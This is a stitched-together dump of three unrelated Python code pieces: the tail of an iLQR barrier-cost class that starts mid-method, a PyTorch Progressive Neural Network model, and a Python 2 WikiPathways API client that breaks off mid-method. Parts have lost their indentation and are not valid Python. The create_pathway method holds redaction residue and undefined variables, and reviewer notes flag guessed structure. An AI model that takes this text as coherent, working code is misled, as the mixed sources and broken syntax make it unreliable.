self.controlBarrierWeight *= 0.5
print("iLQR: Stayed feasible on control constraint, sharpening constraint to %0.3g"%(self.controlBarrierWeight,))
else:
if cold < 0:
self.controlBarrierWeight *= 2.5
print("iLQR: Stayed infeasible on control constraint, diffusing constraint to %0.3g"%(self.controlBarrierWeight,))
else:
print("iLQR: Switched from feasible to infeasible on control constraint, clearance %.3g -> %.3g"%(cold,c))
cold = oldgbc
c = self.goalBarrierClearance
if c >= 0:
if cold < 0:
print("iLQR: Switched from infeasible to feasible on goal constraint, clearance %.3g -> %.3g"%(cold,c))
else:
self.goalBarrierWeight *= 0.5
print("iLQR: Stayed feasible on goal constraint, sharpening constraint to %0.3g"%(self.goalBarrierWeight,))
else:
if cold < 0:
self.goalBarrierWeight *= 2.5
print("iLQR: Stayed infeasible on goal constraint, diffusing constraint to %0.3g"%(self.goalBarrierWeight,))
else:
print("iLQR: Switched from feasible to infeasible on goal constraint, clearance %.3g -> %.3g"%(cold,c))
def barrierFn(self,c):
if self.barrierType == 'inv':
if c <= 0: return float('inf')
return 1.0/c
elif self.barrierType == 'log':
if c <= 0: return float('inf')
if math.isinf(c): return 0
return -math.log(c)
elif self.barrierType == 'square':
if c < 0: return c**2
return 0
else:
raise ValueError("Invalid barrier function")
def barrierDeriv(self,c):
if self.barrierType == 'inv':
if c <= 0: dc = 0.0
else: dc= -1.0/c**2
elif self.barrierType == 'log':
if c <= 0: dc = 0.0
elif math.isinf(c): dc = 0.0
else: dc = -1.0/c
elif self.barrierType == 'square':
if c < 0: dc = 2*c
else: dc = 0
return dc
def barrierDeriv2(self,c):
if self.barrierType == 'inv':
if c <= 0: dc = 0.0
else: dc= 2.0/c**3
elif self.barrierType == 'log':
if c <= 0: dc = 0.0
elif math.isinf(c): dc = 0.0
else: dc = 1.0/c**2
elif self.barrierType == 'square':
if c < 0: dc = 2
else: dc = 0
return dc
def barrier(self,x):
c = self.cspace.clearance(x) - self.barrierShift
if hasattr(c,'__iter__'):
return self.barrierWeight*sum(self.barrierFn(v) for v in c)
else:
return self.barrierWeight*self.barrierFn(c)
def barrier_gradient(self,x):
c = self.cspace.clearance(x) - self.barrierShift
g = self.cspace.clearance_gradient(x)
if hasattr(c,'__iter__'):
return self.barrierWeight*sum(self.barrierDeriv(v)*gi for v,gi in zip(c,g))
else:
return self.barrierWeight*self.barrierDeriv(c)*g
def barrier_hessian(self,x):
c = self.cspace.clearance(x) - self.barrierShift
g = self.cspace.clearance_gradient(x)
if hasattr(c,'__iter__'):
return self.barrierWeight*sum(self.barrierDeriv2(v)*np.outer(gi,gi) for v,gi in zip(c,g))
else:
return self.barrierWeight*self.barrierDeriv2(c)*np.outer(g,g)
def controlBarrier(self,x,u):
if self.controlSpace is None: return 0.0
U = self.controlSpace.controlSet(x)
c = -U.signedDistance(u) - self.controlBarrierShift
if U.signedDistance(u) <= 0:
assert U.contains(u),"Control set %s signed distance %f but doesn't contain %s"%(str(U),U.signedDistance(u),str(u))
else:
assert not U.contains(u),"Control set %s signed distance %f but contains %s"%(str(U),U.signedDistance(u),str(u))
return self.controlBarrierWeight*self.barrierFn(c)
def controlBarrier_gradient(self,x,u):
if self.controlSpace is None: return None
U = self.controlSpace.controlSet(x)
c = -U.signedDistance(u) - self.controlBarrierShift
g = -U.signedDistance_gradient(u)
return self.controlBarrierWeight*self.barrierDeriv(c)*g
def controlBarrier_hessian(self,x,u):
if self.controlSpace is None: return None
U = self.controlSpace.controlSet(x)
c = -U.signedDistance(u) - self.controlBarrierShift
g = -U.signedDistance_gradient(u)
return self.controlBarrierWeight*self.barrierDeriv2(c)*np.outer(g,g)
def goalBarrier(self,x):
c = -self.goalSet.signedDistance(x) - self.goalBarrierShift
return self.goalBarrierWeight*self.barrierFn(c)
def goalBarrier_gradient(self,x):
c = -self.goalSet.signedDistance(x) - self.goalBarrierShift
g = -self.goalSet.signedDistance_gradient(x)
return self.goalBarrierWeight*self.barrierDeriv(c)*g
def goalBarrier_hessian(self,x):
c = -self.goalSet.signedDistance(x) - self.goalBarrierShift
g = -self.goalSet.signedDistance_gradient(x)
return self.goalBarrierWeight*self.barrierDeriv2(c)*np.outer(g,g)
def incremental(self, x, u=None):
    """Incremental (running) cost: base cost plus the state barrier,
    plus the control barrier when a control and control space are present."""
    total = self.base.incremental(x, u) + self.barrier(x)
    if u is None or self.controlSpace is None:
        return total
    return total + self.controlBarrier(x, u)
def terminal(self, x):
    """Terminal cost: base terminal cost plus barriers.

    The goal barrier is included only when a goal set is configured.
    Addition order matches the original formulation (base, goal, state).
    """
    if self.goalSet is None:
        return self.base.terminal(x) + self.barrier(x)
    return self.base.terminal(x) + self.goalBarrier(x) + self.barrier(x)
"""
def incremental_gradient(self,x,u):
return self.incremental_gradient_diff(x,u)
def incremental_hessian(self,x,u):
return self.incremental_hessian_diff(x,u)
def terminal_gradient(self,x):
return self.terminal_gradient_diff(x)
def terminal_hessian(self,x):
return self.terminal_hessian_diff(x)
"""
def incremental_gradient(self, x, u):
    """Gradients (d/dx, d/du) of the incremental cost, barriers included."""
    grad_x, grad_u = self.base.incremental_gradient(x, u)
    if u is not None and self.controlSpace is not None:
        # In-place add, matching the array type returned by the base cost.
        grad_u += self.controlBarrier_gradient(x, u)
    return grad_x + self.barrier_gradient(x), grad_u
def incremental_hessian(self, x, u):
    """Hessian blocks (Hxx, Hxu, Huu) of the incremental cost, barriers included."""
    hess_x, hess_xu, hess_u = self.base.incremental_hessian(x, u)
    if u is not None and self.controlSpace is not None:
        # In-place add, matching the array type returned by the base cost.
        hess_u += self.controlBarrier_hessian(x, u)
    return hess_x + self.barrier_hessian(x), hess_xu, hess_u
def terminal_gradient(self, x):
    """Gradient of the terminal cost, including goal barrier when configured.

    Addition order matches the original formulation (base, goal, state).
    """
    if self.goalSet is None:
        return self.base.terminal_gradient(x) + self.barrier_gradient(x)
    return self.base.terminal_gradient(x) + self.goalBarrier_gradient(x) + self.barrier_gradient(x)
def terminal_hessian(self, x):
    """Hessian of the terminal cost, including goal barrier when configured.

    Addition order matches the original formulation (base, goal, state).
    """
    if self.goalSet is None:
        return self.base.terminal_hessian(x) + self.barrier_hessian(x)
    return self.base.terminal_hessian(x) + self.goalBarrier_hessian(x) + self.barrier_hessian(x)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from src.models.ll_model import LifelongLearningModel
class PNNLinearBlock(nn.Module):
    """One linear layer of one column of a Progressive Neural Network.

    Owns a direct weight ``w`` for its own column's input plus, for columns
    after the first, lateral adapters (``alphas``, ``v``, ``u``) that mix in
    the activations of all previous columns.

    NOTE(review): source indentation was lost; the lateral parameters are
    reconstructed as created only when ``len(in_sizes) > 1``, which matches
    how ``forward`` uses them — confirm against the upstream repository.
    """
    def __init__(self, in_sizes, out_size, scalar_mult=1.0, split_v=False):
        # in_sizes: one input width per column feeding this block; the last
        #   entry is this column's own input width.
        # scalar_mult: initial value of each learnable lateral scale alpha.
        # split_v: use one adapter per previous column instead of a single
        #   adapter over their concatenation.
        super(PNNLinearBlock, self).__init__()
        assert isinstance(in_sizes, (list, tuple))
        self.split_v = split_v
        self.in_sizes = in_sizes
        self.w = nn.Linear(in_sizes[-1], out_size)
        if len(in_sizes) > 1:
            # One learnable scalar per previous column.
            self.alphas = nn.ParameterList()
            for i in range(len(in_sizes) - 1):
                new_alpha = torch.tensor([scalar_mult])#.expand(in_size)
                self.alphas.append(nn.Parameter(new_alpha))
            if split_v:
                self.v = nn.ModuleList([nn.Linear(in_size, in_sizes[-1]) for in_size in in_sizes[:-1]])
            else:
                v_in_size = sum(in_sizes[:-1])
                self.v = nn.Linear(v_in_size, in_sizes[-1])
            self.u = nn.Linear(in_sizes[-1], out_size)

    def forward(self, inputs):
        # inputs: a single tensor (first column) or a list with one tensor
        # per column, this column's own input last.
        if not isinstance(inputs, list):
            inputs = [inputs]
        out = self.w(inputs[-1])
        if len(inputs) > 1:
            # zip stops at the shorter self.alphas, so the last (own-column)
            # input is excluded from the lateral path.
            prev_columns_out = []
            for x, alpha in zip(inputs, self.alphas):
                prev_columns_out.append(alpha * x)
            if self.split_v:
                prev_columns_out = [v(x) for v, x in zip(self.v, prev_columns_out)]
                prev_columns_out = sum(prev_columns_out)
            else:
                prev_columns_out = torch.cat(prev_columns_out, dim=1)
                prev_columns_out = self.v(prev_columns_out)
            out += self.u(F.relu(prev_columns_out))
        return out
class PNN(nn.Module):
    """Progressive Neural Network over a list of columns.

    Each column is a sequence of blocks (e.g. :class:`PNNLinearBlock`); all
    columns are assumed to have the same depth.  Column ``i`` at layer ``l``
    receives the layer ``l-1`` activations of columns ``0..i``.
    """
    def __init__(self, columns):
        # columns: nn.ModuleList of columns, each an indexable sequence of
        # per-layer blocks.
        super(PNN, self).__init__()
        self.columns = columns

    def forward(self, x, task_id=-1):
        """Run all columns on x and return the output of column `task_id`."""
        assert self.columns, 'PNN should at least have one column ' \
                             '(missing call to `new_task` ?)'
        # Layer 0: every column sees the raw input.
        inputs = [c[0](x) for c in self.columns]
        for layer in range(1, len(self.columns[0])):
            inputs = list(map(F.relu, inputs))
            outputs = []
            #TODO: Use task_id to check if all columns are necessary
            for i, column in enumerate(self.columns):
                # Column i gets its own activations plus all earlier columns'.
                outputs.append(column[layer](inputs[:i+1]))
            inputs = outputs
        return inputs[task_id]

    def freeze_columns(self, skip=None):
        """Disable gradients for every column except those listed in `skip`."""
        # Fixed idiom: compare to None with `is`, not `==`.
        if skip is None:
            skip = []
        for i, column in enumerate(self.columns):
            for params in column.parameters():
                params.requires_grad = i in skip
class PNN_LLmodel(LifelongLearningModel):
    """Lifelong-learning wrapper that grows one PNN column per task.

    Relies on the parent class for `get_sizes` and the `get_model` caching
    protocol — presumably defined in `src.models.ll_model`; confirm there.
    """
    def __init__(self, split_v, *args, **kwargs):
        # split_v is forwarded to every PNNLinearBlock that gets created.
        super(PNN_LLmodel, self).__init__(*args, **kwargs)
        self.split_v = split_v
        self.columns = []  # one nn.ModuleList of blocks per task seen so far

    def _new_model(self, x_dim, n_classes, task_id, **kwargs):
        # Build the column for `task_id` and return a PNN over all columns.
        # NOTE(review): `msg` is unused because the assert below is disabled.
        msg = "Should have the out size for each layer + input size " \
              "(got {} sizes but {} layers)."
        sizes = self.get_sizes(x_dim, n_classes)
        # assert len(sizes) == self.n_layers + 1, msg.format(len(sizes),
        #                                                    self.n_layers)
        # Columns must be created in task order, one per task.
        assert task_id == len(self.columns)
        new_column = nn.ModuleList([])
        # First layer sees only the raw input, hence a single in_size.
        new_column.append(PNNLinearBlock([sizes[0]], sizes[1],
                                         split_v=self.split_v))
        # Deeper layers also receive lateral input from all earlier columns.
        for i in range(1, len(sizes)-1):
            new_column.append(
                PNNLinearBlock([sizes[i]] * (task_id + 1), sizes[i + 1],
                               split_v=self.split_v))
        self.columns.append(new_column)
        model = PNN(nn.ModuleList(self.columns))
        model.n_out = 1
        return model

    def get_model(self, task_id, *args, **kwargs):
        # Fetch the cached model and make only the current task's column trainable.
        model = super().get_model(task_id, *args, **kwargs)
        assert len(model.columns) == task_id + 1
        model.freeze_columns(skip=[task_id])
        return model

    def finish_task(self, dataset, task_id, viz=None):
        # After training a task, freeze every column (no `skip`).
        self.get_model(task_id).freeze_columns()
import base64
import csv
import getpass
try:
import lxml
except Exception:
print 'library lxml not supported. WikiPathways and LineageProfiler visualization will not work. Please install with pip install lxml.'
from lxml import etree as ET
from lxml import _elementpath
import re
try: import requests
except Exception:
print 'library requests not supported. WikiPathways and LineageProfiler visualization will not work. Please install with pip install requests.'
import sys
class WikipathwaysApiClient(object):
    """Client for the WikiPathways web service at http://webservice.wikipathways.org/.

    Converts between the API's parameter/field names and this client's
    standardized terms, and enriches results with identifiers.org IRIs.

    NOTE(review): this is Python 2 code (`iteritems`, `basestring`,
    `print` statements elsewhere in the module); it will not run under
    Python 3 as written.  Indentation below was reconstructed from a
    whitespace-stripped source — verify against the upstream project.

    :param identifier: WikiPathways ID for the new :class:`WikipathwaysApiClient` object.
    """
    def __invert_dict(dictionary):
        # Swap keys and values.  Called at class-body evaluation time (see
        # the mapping attributes below), so `dictionary` is a plain
        # positional argument, not `self`.
        return dict((v, k) for k, v in dictionary.iteritems())

    def __get_bridgedb_datasets(self):
        # Lazily download and cache the BridgeDb datasources table; each row
        # yields a system code (column 1) and MIRIAM URN (column 8).
        if hasattr(self, 'bridgedb_datasets'):
            bridgedb_datasets = self.bridgedb_datasets
        else:
            bridgedb_datasets_request = requests.get('https://raw.githubusercontent.com/bridgedb/BridgeDb/master/org.bridgedb.bio/resources/org/bridgedb/bio/datasources.txt')
            bridgedb_datasets_string = bridgedb_datasets_request.text
            bridgedb_datasets_csv = csv.reader(bridgedb_datasets_string.split('\n'), delimiter='\t')
            bridgedb_datasets_parsed = [];
            for bridgedb_dataset_csv in bridgedb_datasets_csv:
                if bridgedb_dataset_csv:
                    bridgedb_dataset_parsed = {}
                    bridgedb_dataset_parsed['system_code'] = bridgedb_dataset_csv[1]
                    bridgedb_dataset_parsed['miriam'] = bridgedb_dataset_csv[8]
                    bridgedb_datasets_parsed.append(bridgedb_dataset_parsed)
            self.bridgedb_datasets = bridgedb_datasets_parsed
        return self.bridgedb_datasets

    def __parse_identifiers_iri(self, iri):
        # Split an identifiers.org IRI (e.g. .../ncbigene/7040) into its
        # preferred prefix and identifier, then look up the BridgeDb
        # system code for that prefix.
        iri_components = iri.split('identifiers.org')
        iri_path = iri_components[len(iri_components) - 1]
        iri_path_components = iri_path.split('/')
        preferred_prefix = iri_path_components[1]
        identifier = iri_path_components[2]
        bridgedb_datasets = self.__get_bridgedb_datasets()
        for bridgedb_dataset in bridgedb_datasets:
            if 'urn:miriam:' + preferred_prefix == bridgedb_dataset['miriam']:
                system_code = bridgedb_dataset['system_code']
        # NOTE(review): if no dataset matches, `system_code` is unbound and
        # this raises NameError — TODO confirm intended behavior upstream.
        return {
            'preferred_prefix': preferred_prefix,
            'identifier': identifier,
            'system_code': system_code
        }

    # Web-service parameter/field name -> standardized term used by this client.
    api_to_standard_term_mappings = {
        'id': 'identifier',
        'ids': 'identifiers',
        'pwId': 'identifier',
        'revision': 'version',
        'graphId': 'element_identifiers',
        'color': 'colors',
        'fileType': 'file_format',
        'species': 'organism',
        'url': 'web_page',
        'codes': 'system_codes'
    }

    # Filename extension accepted by the API -> IANA media type.
    filename_extension_to_media_type_mappings = {
        'svg': 'image/svg+xml',
        'png': 'image/png',
        'pdf': 'application/pdf',
        'gpml': 'application/gpml+xml',
        'txt': 'text/vnd.genelist+tab-separated-values',
        'pwf': 'text/vnd.eu.gene+plain',
        'owl': 'application/vnd.biopax.owl+xml',
    }
    filename_extensions = filename_extension_to_media_type_mappings.keys()
    media_types = filename_extension_to_media_type_mappings.values()
    # Reverse mapping, built at class-creation time via __invert_dict.
    media_type_to_filename_extension_mappings = __invert_dict(filename_extension_to_media_type_mappings)

    # English common name -> NCBI taxonomy IRI.
    english_name_to_iri_mappings = {
        'African malaria mosquito': 'http://identifiers.org/taxonomy/7165',
        'beet': 'http://identifiers.org/taxonomy/161934',
        'thale cress': 'http://identifiers.org/taxonomy/3702',
        'cattle': 'http://identifiers.org/taxonomy/9913',
        'roundworm': 'http://identifiers.org/taxonomy/6239',
        'dog': 'http://identifiers.org/taxonomy/9615',
        'sea vase': 'http://identifiers.org/taxonomy/7719',
        'zebrafish': 'http://identifiers.org/taxonomy/7955',
        'fruit fly': 'http://identifiers.org/taxonomy/7227',
        'Escherichia coli': 'http://identifiers.org/taxonomy/562',
        'horse': 'http://identifiers.org/taxonomy/9796',
        'chicken': 'http://identifiers.org/taxonomy/9031',
        'soybean': 'http://identifiers.org/taxonomy/3847',
        'human': 'http://identifiers.org/taxonomy/9606',
        'barley': 'http://identifiers.org/taxonomy/4513',
        'Rhesus monkey': 'http://identifiers.org/taxonomy/9544',
        'mouse': 'http://identifiers.org/taxonomy/10090',
        'platypus': 'http://identifiers.org/taxonomy/9258',
        'long-grained rice': 'http://identifiers.org/taxonomy/39946',
        'rice': 'http://identifiers.org/taxonomy/4530',
        'black cottonwood': 'http://identifiers.org/taxonomy/3694',
        'chimpanzee': 'http://identifiers.org/taxonomy/9598',
        'Norway rat': 'http://identifiers.org/taxonomy/10116',
        'baker\'s yeast': 'http://identifiers.org/taxonomy/4932',
        'tomato': 'http://identifiers.org/taxonomy/4081',
        'pig': 'http://identifiers.org/taxonomy/9823',
        'wine grape': 'http://identifiers.org/taxonomy/29760',
        'western clawed frog': 'http://identifiers.org/taxonomy/8364',
        'maize': 'http://identifiers.org/taxonomy/4577'
    }
    iri_to_english_name_mappings = __invert_dict(english_name_to_iri_mappings)

    # Latin name -> NCBI taxonomy IRI.
    # NOTE(review): the '<NAME>' key is redaction residue from the data
    # source (presumably 'Danio rerio' given IRI 7955) — restore upstream.
    latin_name_to_iri_mappings = {
        'Anopheles gambiae': 'http://identifiers.org/taxonomy/7165',
        'Arabidopsis thaliana': 'http://identifiers.org/taxonomy/3702',
        'Aspergillus niger': 'http://identifiers.org/taxonomy/5061',
        'Bacillus subtilis': 'http://identifiers.org/taxonomy/1423',
        'Beta vulgaris': 'http://identifiers.org/taxonomy/161934',
        'Bos taurus': 'http://identifiers.org/taxonomy/9913',
        'Caenorhabditis elegans': 'http://identifiers.org/taxonomy/6239',
        'Canis familiaris': 'http://identifiers.org/taxonomy/9615',
        'Ciona intestinalis': 'http://identifiers.org/taxonomy/7719',
        'Ruminiclostridium thermocellum': 'http://identifiers.org/taxonomy/1515',
        'Clostridium thermocellum': 'http://identifiers.org/taxonomy/1515',
        '<NAME>': 'http://identifiers.org/taxonomy/7955',
        'Drosophila melanogaster': 'http://identifiers.org/taxonomy/7227',
        'Escherichia coli': 'http://identifiers.org/taxonomy/562',
        'Equus caballus': 'http://identifiers.org/taxonomy/9796',
        'Gallus gallus': 'http://identifiers.org/taxonomy/9031',
        'Gibberella zeae': 'http://identifiers.org/taxonomy/5518',
        'Glycine max': 'http://identifiers.org/taxonomy/3847',
        'Homo sapiens': 'http://identifiers.org/taxonomy/9606',
        'Hordeum vulgare': 'http://identifiers.org/taxonomy/4513',
        'Macaca mulatta': 'http://identifiers.org/taxonomy/9544',
        'Mus musculus': 'http://identifiers.org/taxonomy/10090',
        'Mycobacterium tuberculosis': 'http://identifiers.org/taxonomy/1773',
        'Ornithorhynchus anatinus': 'http://identifiers.org/taxonomy/9258',
        'Oryza indica': 'http://identifiers.org/taxonomy/39946',
        'Oryza sativa': 'http://identifiers.org/taxonomy/4530',
        'Oryza sativa Indica Group': 'http://identifiers.org/taxonomy/39946',
        'Populus trichocarpa': 'http://identifiers.org/taxonomy/3694',
        'Pan troglodytes': 'http://identifiers.org/taxonomy/9598',
        'Rattus norvegicus': 'http://identifiers.org/taxonomy/10116',
        'Saccharomyces cerevisiae': 'http://identifiers.org/taxonomy/4932',
        'Solanum lycopersicum': 'http://identifiers.org/taxonomy/4081',
        'Sus scrofa': 'http://identifiers.org/taxonomy/9823',
        'Vitis vinifera': 'http://identifiers.org/taxonomy/29760',
        'Xenopus tropicalis': 'http://identifiers.org/taxonomy/8364',
        'Zea mays': 'http://identifiers.org/taxonomy/4577'
    }

    def __init__(self, base_iri=None):
        # base_iri: root URL of the web service; defaults to the public endpoint.
        if base_iri is None:
            base_iri = 'http://webservice.wikipathways.org/'
        self.base_iri = base_iri
        # define namespaces
        self.NAMESPACES = {'ns1':'http://www.wso2.org/php/xsd','ns2':'http://www.wikipathways.org/webservice/'}

    def __convert_standard_terms_to_api_terms(self, input_params):
        # Translate standardized parameter names back into the names the
        # web service expects; unknown keys pass through unchanged.
        terms_to_convert = self.api_to_standard_term_mappings
        standard_terms = terms_to_convert.values()
        api_terms = terms_to_convert.keys()
        request_params = {}
        for key, value in input_params.iteritems():
            if (key in standard_terms):
                def get_api_term(candidate_api_term):
                    return self.api_to_standard_term_mappings[candidate_api_term] == key
                # Several API terms can map to one standard term
                # (e.g. 'id' and 'pwId'); the first match wins.
                api_term = filter(get_api_term, api_terms)[0]
                request_params[api_term] = input_params[key]
            else:
                request_params[key] = input_params[key]
        return request_params

    def __convert_api_terms_to_standard_terms(self, input_object):
        # Translate API field names in a response object into standardized
        # terms; unknown keys pass through unchanged.
        terms_to_convert = self.api_to_standard_term_mappings
        standard_terms = terms_to_convert.values()
        api_terms = terms_to_convert.keys()
        output_object = {}
        for key, value in input_object.iteritems():
            if (key in api_terms):
                # NOTE(review): despite its name, `api_term` here holds the
                # *standard* term looked up from the mapping.
                api_term = terms_to_convert[key]
                output_object[api_term] = input_object[key]
            else:
                output_object[key] = input_object[key]
        return output_object

    def __convert_organism_to_dict(self, organism):
        # Resolve an organism given as IRI, Latin name, English name, or a
        # dict with '@id' into the full organism dict from list_organisms().
        # Returns None implicitly when nothing matches.
        if hasattr(self, 'organism_dicts'):
            organism_dicts = self.organism_dicts
        else:
            organism_dicts = self.organism_dicts = self.list_organisms()
        for organism_dict in organism_dicts:
            if isinstance(organism, basestring):
                if organism_dict['@id'] == organism:
                    return organism_dict
                elif organism_dict['name']['la'] == organism:
                    return organism_dict
                elif organism_dict['name'].get('en') and organism_dict['name']['en'] == organism:
                    return organism_dict
            elif organism.get('@id') and organism['@id'] == organism_dict['@id']:
                return organism_dict

    def __enrich_pathway(self, pathway):
        # Add an identifiers.org IRI and expand a bare organism string
        # into the full organism dict.
        pathway['@id'] = 'http://identifiers.org/wikipathways/' + pathway['identifier']
        if pathway.get('organism') and isinstance(pathway['organism'], basestring):
            pathway['organism'] = self.__convert_organism_to_dict(pathway['organism'])
        return pathway

    def create_pathway(self):
        ###
        # author: msk (<EMAIL>)
        ###
        # NOTE(review): this method is broken as written — `username`,
        # `namespaces`, and `gpml_file` are undefined, and `<PASSWORD>` is
        # redaction residue (not valid Python).  It also rebinds the name
        # `re`, shadowing the imported regex module.  Do not call until fixed.
        # login
        pswd = getpass.getpass('Password:')
        auth = {'name' : username , 'pass' : <PASSWORD>}
        r_login = requests.get(self.base_iri + 'login', params=auth)
        dom = ET.fromstring(r_login.text)
        authentication = ''
        for node in dom.findall('ns1:auth', namespaces):
            authentication = node.text
        # read gpml file
        f = open(gpml_file, 'r')
        gpml = f.read()
        # create pathway
        update_params = {'auth' : username+'-'+authentication, 'gpml': gpml}
        re = requests.post(self.base_iri + 'createPathway', params=update_params)
        #print re.text

    def get_colored_pathway(self, identifier, element_identifiers, colors, version = '0', file_format = 'svg'):
        """Sends a GET request. Returns file as string.

        Args:
            identifier (str): WikiPathways ID.
            element_identifiers (list of str): means of identifying one or more elements in a pathway,
                for example, specify GPML GraphIds as ["ffffff90","ffffffe5"].
            colors (list of str): one or more hexadecimal number(s), representing the colors to use for
                the corresponding element_identifier (if the length of the colors list is equal to the
                length of the element_identifiers list) or the single color to use for all element_identifiers
                (if the colors list is not equal in length to the element_identifiers list).
                Example: ["#0000FF","#0000FF"].
            version (str, optional): The version of the pathway. Defaults to '0', which means latest.
            file_format (str): IANA media type (http://www.iana.org/assignments/media-types/media-types.xhtml)
                or filename extension desired for response. Defaults to 'svg'. Examples:
                    Media types:
                        * 'image/svg+xml'
                        * 'image/png'
                        * 'application/pdf'
                    Filename extensions:
                        * 'svg'
                        * 'png'
                        * 'pdf'
        """
        # API does not yet support content-type negotiation, so we need to convert
        # filename extension to be used as a query parameter.
        if file_format in self.media_types:
            file_format = self.media_type_to_filename_extension_mappings[file_format]
        # HTML/CSS defaults use a pound sign before the HEX number, e.g. #FFFFFF.
        # But the API does not use this, so to make it easier for users, we are
        # accepting the pound sign in the input args and stripping it here.
        input_colors = colors
        colors = []
        non_letter_number_pattern = re.compile('[^a-zA-Z0-9]+')
        for input_color in input_colors:
            color = non_letter_number_pattern.sub('', input_color)
            colors.append(color)
        input_params = {
            'identifier': identifier,
            'version': version,
            'element_identifiers': element_identifiers,
            'colors': colors,
            'file_format': file_format
        }
        request_params = self.__convert_standard_terms_to_api_terms(input_params)
        response = requests.get(self.base_iri + 'getColoredPathway', params=request_params)
        dom = ET.fromstring(response.text)
        node = dom.find('ns1:data', self.NAMESPACES)
        file = base64.b64decode(node.text) ### decode this file
        return file

    def get_pathway_as(self, identifier, version = '0', file_format = 'gpml'):
        """
        Sends a GET request. Returns an LXML object for any XML media type
        and a string for anything else

        Args:
            identifier (str): WikiPathways ID.
            version (str, optional): The version of the pathway. Defaults to '0', which means latest.
            file_format (str): IANA media type (http://www.iana.org/assignments/media-types/media-types.xhtml)
                or filename extension desired for response. Defaults to 'gpml'.
                Examples:
                    Media types:
                        * 'application/gpml+xml'
                        * 'text/vnd.genelist+tab-separated-values'
                        * 'text/vnd.eu.gene+plain'
                        * 'application/vnd.biopax.owl+xml'
                        * 'image/svg+xml'
                        * 'image/png'
                        * 'application/pdf'
                    Filename extensions:
                        * 'gpml'
                        * 'txt'
                        * 'pwf'
                        * 'owl'
                        * 'svg'
                        * 'png'
                        * 'pdf'
        """
        # API does not yet support content-type negotiation, so we need to convert
        # filename extension to be used as a query parameter.
        if file_format in self.media_types:
            file_format = self.media_type_to_filename_extension_mappings[file_format]
        input_params = {
            'identifier': identifier,
            'version': version,
            'file_format': file_format
        }
        request_params = self.__convert_standard_terms_to_api_terms(input_params)
        response = requests.get(self.base_iri + 'getPathwayAs', params=request_params)
        #print [response.text];sys.exit()
        dom = ET.fromstring(response.text)
        node = dom.find('ns1:data', self.NAMESPACES)
        response_string = base64.b64decode(node.text) ### decode this file
        # NOTE(review): both branches return the raw string — the XML
        # parsing path is disabled, so the docstring's "LXML object" claim
        # no longer holds in practice.
        if request_params['fileType'] == 'gpml' or request_params['fileType'] == 'owl' or request_params['fileType'] == 'svg':
            #response = ET.fromstring(response_string)
            response = response_string
        else:
            response = response_string
        return response

    def get_pathway_info(self, identifier):
        """Sends a GET request. Returns pathway metadata as dict.

        Args:
            identifier (str): WikiPathways ID.
        """
        request_params = {'pwId' : identifier}
        response = requests.get(self.base_iri + 'getPathwayInfo', params=request_params)
        dom = ET.fromstring(response.text)
        pathway_using_api_terms = {}
        for node in dom.findall('ns1:pathwayInfo', self.NAMESPACES):
            for attribute in node:
                pathway_using_api_terms[ET.QName(attribute).localname] = attribute.text
        pathway = self.__convert_api_terms_to_standard_terms(pathway_using_api_terms)
        pathway = self.__enrich_pathway(pathway)
        return pathway

    def find_pathways_by_text(self, query, organism = None):
        """Sends a GET request. Returns pathways as list of dicts.

        Args:
            query (str): Text to search for.
            organism (str or dict, optional): Limit to organism with given name
                (Latin or English) or @id (from http://identifiers.org/taxonomy/)
        """
        input_params = {}
        input_params['query'] = query
        if organism:
            # The API filters by Latin name only.
            input_params['organism'] = self.__convert_organism_to_dict(organism)['name']['la']
        request_params = self.__convert_standard_terms_to_api_terms(input_params)
        response = requests.get(self.base_iri + 'findPathwaysByText', params=request_params)
        dom = ET.fromstring(response.text)
        pathways = []
        for node in dom.findall('ns1:result', self.NAMESPACES):
            pathway_using_api_terms = {}
            for child in node:
                pathway_using_api_terms[ET.QName(child).localname] = child.text
            pathway = self.__convert_api_terms_to_standard_terms(pathway_using_api_terms)
            pathway = self.__enrich_pathway(pathway)
            pathways.append(pathway)
        return pathways

    def find_pathways_by_xref(self, **kwargs):
        """Sends a GET request. Returns pathways as a list of dicts.

        Required: either just @id or both system_codes and identifiers.

        Args:
            @id (list of str): One or more identifiers.org IRIs, like ['http://identifiers.org/ncbigene/7040'].
            system_codes (list of str): One or more BridgeDb system codes.
            identifiers (list of str): One or more entity reference identifiers.
        """
        if kwargs.get('@id'):
            if not isinstance(kwargs['@id'], list):
                kwargs['@id'] = [kwargs['@id']]
            # Derive system codes and identifiers from the IRIs.
            system_codes = []
            identifiers = []
            for iri in kwargs['@id']:
                identifiers_iri_components = self.__parse_identifiers_iri(iri)
                system_codes.append(identifiers_iri_components['system_code'])
                identifiers.append(identifiers_iri_components['identifier'])
            input_params = {
                'system_codes': system_codes,
                'identifiers': identifiers
            }
        else:
            input_params = kwargs
        request_params = self.__convert_standard_terms_to_api_terms(input_params)
        response = requests.get(self.base_iri + 'findPathwaysByXref', params=request_params)
        dom = ET.fromstring(response.text)
        pathways = []
        for resultNode in dom.findall('ns1:result', self.NAMESPACES):
            pathway_using_api_terms = {}
            pathway_using_api_terms['fields'] = []
            for childNode in resultNode:
                if ET.QName(childNode).localname != 'fields':
                    pathway_using_api_terms[ET.QName(childNode).localname] = childNode.text
                elif ET.QName(childNode).localname == 'fields':
                    field = {}
                    for fieldChildNode in childNode:
                        #TODO standardize names & values from fieldChildNode.text
                        field[ET.QName(fieldChildNode).localname] = fieldChildNode.text
                    pathway_using_api_terms['fields'].append(field)
            pathway = self.__convert_api_terms_to_standard_terms(pathway_using_api_terms)
            pathway = self.__enrich_pathway(pathway)
            pathways.append(pathway)
        return pathways

    def list_organisms(self):
        """Sends a GET request. Returns :list:`organisms` object, each an organism as a dict,
        with the IRI, Latin name and English name (when available).
        """
        response = requests.get(self.base_iri + 'listOrganisms')
        dom = ET.fromstring(response.text)
        organisms = []
        for node in dom:
            # Organisms whose Latin name is missing from
            # latin_name_to_iri_mappings raise KeyError and are skipped.
            try:
                organism = {}
                organism['@context'] = [
                    {
                        'name': {
                            '@id': 'biopax:name',
                            '@container': '@language'
                        },
                        'Organism': 'http://identifiers.org/snomedct/410607006'
                    }
                ]
                organism['@type'] = 'Organism'
                organism['name'] = {}
                organism['name']['la'] = latin_name = node.text
                organism['@id'] = self.latin_name_to_iri_mappings[latin_name]
                english_name = self.iri_to_english_name_mappings.get(organism['@id'])
                if english_name != None:
                    organism['name']['en'] = english_name
                organisms.append(organism)
            except Exception:
                pass
        return organisms

    # list pathways
    def list_pathways(self, organism):
        # Sends a GET request; returns all pathways for `organism`
        # (Latin name string) as a list of enriched dicts.
        request_params = {'organism': organism}
